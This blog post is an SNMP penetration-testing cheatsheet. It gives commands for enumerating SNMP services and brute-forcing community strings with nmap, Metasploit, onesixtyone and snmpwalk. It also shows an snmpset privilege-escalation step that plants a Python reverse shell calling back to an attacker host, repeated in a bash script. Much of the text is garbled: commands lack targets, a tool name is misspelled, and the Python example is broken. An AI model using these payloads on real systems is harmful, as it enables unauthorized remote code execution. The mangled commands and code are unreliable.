SNMP Pentest Cheatsheet - Port 161


Basic info About SNMP

Ports - 161,162,10161,10162/udp  

SNMP is a based on UDP, stateless protocol --> susceptible to IP spoofing and replay attacks.
SNMP1, SNMP2, SNMP2C --> can be locally irrupted over a local network.

SNMP is a UDP protocol & UDP scanning that UDP requires a matching port and payload or it won't respond.
This means we have to get the community string correct or we won't get any sort of a response.

In-case, when a response is received, it contains the community string, and the scanner can
identify the valid community string. MIB-values System Processes Running Programs Processes Path Storage Units Software's Installed & Hotfixes TCP Local Ports System Description

OID and MIB Hierarchy
OID and MIB Hierarchy - the way MIB-Values are created

Enum via NMAP

#Run SNMP Nmap Scripts
nmap -sCUV -p161 --script=snmp-info,snmp-interfaces,snmp-netstat,snmp-sysdescr,snmp-processes,snmp-win32-software

#Brute forcing community strings
nmap -sUCV -Pn -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt

#Run all scripts related to snmp
nmap -sU -p 161 --script snmp-* -Pn

use scanner/snmp/snmp_enum 

#Find SNMP Shares
use auxiliary/scanner/snmp/snmp_enumshares

use auxiliary/scanner/snmp/snmp_login
set PASS_FILE  /usr/share/wordlists/rockyou.txt

Check this for SMBPSet
Enum via SNMPENUM Script
git clone
perl public linux.txt
Enumeration using OneSixtyOne

#Checks for given Community Strings for given IP addresses
for ip in$(seq 100 254) ;do echo 192.168.31.$ip; done > ips.txt
prips > targets.txt Community Strings sample path = /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt
#brute force community strings against IP Addresses
onesixtyoone -c community_strings.txt -i ips.txt

#multiple communities against a single host
onesixtyone -c community_strings.txt

#Multiple Targets against a single Community string
onesixtyone -i ips.txt public
Enum Using snmpwalk

snmpwalk -c public -v 2c
snmpwalk -c pr1v@te -v 2c
#/v1= SNMP version1, -c =community string - public snmpwalk -c public -v1 #Get Running Processes snmpwalk -c public #Get Open TCP Ports snmpwalk -c public #SNMP Extended List sudo apt-get install snmp-mibs-downloader sudo download-mibs sudo nano /etc/snmp/snmp.conf mibs +ALL #Add NEW MIBS snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
Enum using snmpbulkwalk 

snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . 
snmpbulkwalk -c public -v2c .
Enum Using SNMPCheck 
#Basic Syntax
snmpcheck -t -c public
Priv Esc when you have snmpd.conf - rwcommunity string
sudo apt-get install snmp-mibs-downloader
sudo download-mibs
sudo nano /etc/snmp/snmp.conf
mibs +ALL #Add NEW MIBS
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD ‘nsExtendStatus.”evilcommand”‘ = createAndGo ‘nsExtendCommand.”evilcommand”‘ = /usr/bin/python3 ‘nsExtendArgs.”evilcommand”‘ = ‘-c “import sys,socket,os,pty;s=socket.socket();s.connect((\”KALI_IP\”,PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\”/bin/sh\”)”‘

#Find the ISO
snmpwalk -v 2c -c PASSWORD

Automating the task using python:

#!/bin/bash random="holyshit" snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD \ "nsExtendStatus.\"${random}\"" = createAndGo \ "nsExtendCommand.\"${random}\"" = /usr/bin/python3 \ "nsExtendArgs.\"${random}\"" = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"\",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"' snmpwalk -v 2c -c PASSWORD
Access SNMP Service via Python

from pysnmp.hlapi import *

target_host = ''
community_string = 'public'  # Replace with the actual community string
oid_to_get = ''  # Example OID for system description

# Perform SNMP GET operation
errorIndication, errorStatus, errorIndex, varBinds = next(
           UdpTransportTarget((target_host, 161)),

# Check for errors
if errorIndication:
    if errorStatus:
        print('%s at %s' % (errorStatus.prettyPrint(),
                            errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
        for varBind in varBinds:
            print(' = '.join([x.prettyPrint() for x in varBind]))

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment